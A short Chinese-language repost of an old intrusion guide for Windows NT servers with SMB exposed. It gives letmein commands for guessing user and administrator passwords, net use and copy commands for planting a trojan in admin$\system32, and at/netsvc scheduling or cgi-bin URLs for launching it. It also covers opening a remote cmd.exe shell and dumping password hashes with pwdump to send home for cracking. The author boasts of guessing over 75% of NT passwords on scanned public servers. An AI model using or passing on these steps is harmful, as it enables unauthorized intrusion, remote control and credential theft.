| 关键词: letmein 远程 攻击 木马 管理员 目标 火墙 资源 exe yourport |
共享机制如果不配合火墙使用,SMB会给你造成很大麻烦。。 连小小 只的木马都可以让nt管理员头大。 其攻击过程如下: 1、使用扫描工具查找NT主机 2 、确定攻击目标后,使用letmein 对目标主机进行攻击, 如: letmein file://x.x.x.x/ -all -g mypwd (对\\x.x.x.x上所有用户攻击) letmein file://x.x.x.x/ -admin -g mypwd (对\\x.x.x.x上管理员攻击) letmein file://x.x.x.x/ -all -d mypwd (显示\\x.x.x.x上所有用户) 注:- 确定目标后,收集目标信息并尝试取得非法资源 3、当letmein 获取相关管理员权限后,使用ms提供的合法命令: net use \\x.x.x.x\ipc$ "pass"/user:"user" 连接远程资源并将木马拷入远程 copy x:\netserver.exe \\x.x.x.x\admin$\system32 4、使用合法ms命令远程启动木马服务: netsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 该方法有其巧妙之处。。利用nt的任务计划管理,在特定时候启动木马服务 另一种方法: 将ntsrver.exe 或其他运行程序Copy到目的服务器的www可执行目录, 如cgi-bin或scri pts,然后在浏览器键入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木马服务将被启动 到此,该次攻击可以算成功了,远程资源已在别人控制下。 如果在远程使用app redirect 启动一个cmd.exe到特定端口 , 那么你可以telnet 到该 端口,更方便使用该远程资源 。比如:使用pwdump 将远程nt上所有用户和密码 dump成文件 ,回传本地,使用其他工具如l0phtcrack来运算。 分析该次攻击的整体过程,不难看出,关 键步骤是letmein取得admin权限,但是很不幸,就目前厦门(有些是省内)的nt服务器管理员而 言,密码对letmein只是多花几分钟而已。我对某些大的公共平台服务器进行扫描的结果,除 了solaris和linux系统之外,其余的nt被letmein猜中率有75%以上。而且在这些被进入的机器 上,SMB都有在tcp/ip上 跑,有两台有配备火墙,但是没有封闭对外137-139口。 老套了 搬出来 不要见笑 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|